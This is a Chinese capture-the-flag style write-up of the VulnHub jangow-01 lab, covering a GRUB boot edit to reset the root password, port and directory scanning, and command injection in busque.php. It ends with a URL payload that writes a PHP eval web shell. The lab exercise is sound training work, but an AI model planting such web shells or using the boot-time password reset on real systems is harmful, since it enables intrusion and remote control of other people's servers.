当前位置: 首页 > article >正文

vulnhub靶场-jangow-01-1.0.1(截止至获取shell)

安装靶机后我们发现我们扫描不到靶机的ip,所以我们需要修改靶机的配置文件

系统启动时,长按shift键,选择第二个选项,回车后再选择第二个选项

然后不要回车,按e,进入后向下翻 找到并删除删除“recovery nomodeset”并在最后添加“quiet splash rw init=/bin/bash”,修改完成后按F10启动

ro/rw表示以只读(ro)/读写(rw)模式挂载根文件系统;

quiet用于设置静默模式;

splash用于设置启动时的屏幕输出;

init用于指定内核挂载根文件系统后运行的第一个用户空间程序的绝对路径(也有文章描述为设置内核执行的初始化进程名)。

输入passwd修改root账户的密码

修改完成后重启登录,账户名root 密码为刚才修改的密码

使用ipconfig -a 查看自己的网卡名

然后vim /etc/network/interfaces来修改自己的网卡信息

该文件是一个重要的网络配置文件,通常用于配置 Linux 系统中的网络接口和网络参数。它在 Debian 系统及其衍生版本(如 Ubuntu)中广泛使用,用于定义网络接口的配置信息,如IP地址、子网掩码、网关、DNS等。

将此处原先的网卡名称修改为自己的网卡名称

修改完成后按esc 然后 shift+/wq! 保存退出,然后重启靶机,这样kali就能扫描到我们的靶机IP了

扫描到了靶机IP,为192.168.171.129

扫描端口,只存在80端口以及21端口

扫描目录,只存在一个/site目录,访问,查看页面并没有什么功能点

点击Buscar,此时url可能有突破点

我们尝试whoami,成功执行,说明此处存在命令执行漏洞

我们尝试将一句话木马直接写入

http://192.168.171.129/site/busque.php?buscar=echo '<?php @eval($_POST["cmd"])?>' > shell.php

//注意 写入该木马时,echo 后面要写入到指定文件的内容需要用单引号括起来,不可以使用双引号,$_POST里的使不使用单双引号括起来都行

写入成功,我们尝试访问shell.php并执行参数,则获取shell成功,后续使用蚁剑连接即可


http://www.kler.cn/a/455506.html

相关文章:

  • Oracle中listagg与wm_concat函数的区别
  • 【Android】application@label 属性属性冲突报错
  • 为什么要在PHY芯片和RJ45网口中间加网络变压器
  • YOLO11改进-注意力-引入自调制特征聚合模块SMFA
  • 通过交叉实现数据触底分页效果new IntersectionObserver()(html、react、vue2、vue3)中使用
  • Matrix-Breakout 2 Morpheus(找到第一个flag)
  • 《Web 项目开发之旅》
  • 工厂+策略模式之最佳实践(疾病报卡维护模块API设计)
  • 复合机器人:开启智能制造新时代
  • 单例模式的写法
  • IOS safari 播放 mp4 遇到的坎儿
  • QT + FFMPEG实现简易播放器
  • Django 管理界面中注册和配置 ECSCluster 模型
  • 第T4周:TensorFlow实现猴痘识别(Tensorboard的使用)
  • 如何实现底部导航栏
  • springboot478基于vue全家桶的pc端仿淘宝系统(论文+源码)_kaic
  • Log4j2的Policies详解、SizeBasedTriggeringPolicy、TimeBasedTriggeringPolicy
  • Qt 模型Model/视图View/代理Delegate
  • 解锁 Claude 的无限潜力:Prompt Engineering 从入门到精通
  • 游戏开发线性空间下PS工作流程
  • 使用c#制作坐标
  • MySql索引(基础篇)
  • 【UE5 C++课程系列笔记】12——Gameplay标签的基本使用
  • 聊聊强化学习在无人机中的前沿应用
  • act小试牛刀
  • CCF-GESP 等级考试 2023年9月认证C++五级真题解析